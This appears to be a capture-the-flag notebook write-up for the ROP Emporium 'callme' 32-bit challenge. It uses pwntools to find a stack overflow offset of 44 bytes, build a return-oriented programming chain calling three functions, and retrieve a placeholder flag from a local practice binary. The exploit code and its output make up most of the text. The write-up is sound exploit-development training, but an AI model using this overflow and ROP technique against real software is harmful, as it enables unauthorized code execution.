# Solution for callme x86 - ROP Emporium

In [1]:
import pwn
from pwn import *

Let's see what type of file we're working with
```text
┌──(hanoz㉿kali)-[~/Desktop/ropemporium/callme/callme32]
└─ file callme32                                                                                                                                                                                                                      130 ⨯
callme32: ELF 32-bit LSB executable
```
Let's see the options on the binary
```text
gdb-peda checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
```
Let's see what functions are on the binary
```text
0x08048686  main
0x080486ed  pwnme
0x0804874f  usefulFunction
0x080484e0  callme_three@plt
0x080484f0  callme_one@plt
0x08048550  callme_two@plt
```
From the challenge we know that we have to call these 3 functions 
main calls callme
We have to create a ROP chain so let's get started. 


In [2]:
p = process('./callme32')
elf = ELF('./callme32',checksec=False)
rop = ROP(elf)

[x] Starting local process './callme32'
[+] Starting local process './callme32': pid 20006
[*] Loading gadgets for '/home/hanoz/Desktop/ropemporium/callme/callme32/callme32'


In [3]:
init_recvd = p.recv()
print(init_recvd)

b'callme by ROP Emporium\nx86\n\nHope you read the instructions...\n\n> '


In [5]:
x = 50
payload = cyclic(x,n=4) 
p.sendline(payload)

p.wait()
core = p.corefile

offset = cyclic_find(core.fault_addr)
log.success("We have found the offset at location " + str(offset))

[*] Process './callme32' stopped with exit code -11 (SIGSEGV) (pid 19916)
[x] Parsing corefile...
[*] '/home/hanoz/Desktop/ropemporium/callme/callme32/core.19916'
    Arch:      i386-32-little
    EIP:       0x6161616c
    ESP:       0xffa25b80
    Exe:       '/home/hanoz/Desktop/ropemporium/callme/callme32/callme32' (0x8048000)
    Fault:     0x6161616c
[+] Parsing corefile...: Done
[+] We have found the offset at location 44


In [4]:
args = [0xdeadbeef, 0xcafebabe, 0xd00df00d]
rop.callme_one(*args)
rop.callme_two(*args)
rop.callme_three(*args)

print(rop.dump())


0x0000:        0x80484f0 callme_one(0xdeadbeef, 0xcafebabe, 0xd00df00d)
0x0004:        0x80484aa <adjust @0x14> add esp, 8; pop ebx; ret
0x0008:       0xdeadbeef arg0
0x000c:       0xcafebabe arg1
0x0010:       0xd00df00d arg2
0x0014:        0x8048550 callme_two(0xdeadbeef, 0xcafebabe, 0xd00df00d)
0x0018:        0x80484aa <adjust @0x28> add esp, 8; pop ebx; ret
0x001c:       0xdeadbeef arg0
0x0020:       0xcafebabe arg1
0x0024:       0xd00df00d arg2
0x0028:        0x80484e0 callme_three(0xdeadbeef, 0xcafebabe, 0xd00df00d)
0x002c:          b'laaa' <return address>
0x0030:       0xdeadbeef arg0
0x0034:       0xcafebabe arg1
0x0038:       0xd00df00d arg2


In [7]:
rop_chain = rop.chain()
print(rop_chain)

b'\xf0\x84\x04\x08\xaa\x84\x04\x08\xef\xbe\xad\xde\xbe\xba\xfe\xca\r\xf0\r\xd0P\x85\x04\x08\xaa\x84\x04\x08\xef\xbe\xad\xde\xbe\xba\xfe\xca\r\xf0\r\xd0\xe0\x84\x04\x08laaa\xef\xbe\xad\xde\xbe\xba\xfe\xca\r\xf0\r\xd0'


In [8]:
payload = b"A"*44
p.sendline (payload + rop_chain)

In [9]:
flag_line = p.recvuntil("}")
print(flag_line)

[*] Process './callme32' stopped with exit code 0 (pid 20006)
b'Thank you!\ncallme_one() called correctly\ncallme_two() called correctly\nROPE{a_placeholder_32byte_flag!}'


/tmp/ipykernel_19988/1118392199.py:1: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  flag_line = p.recvuntil("}")
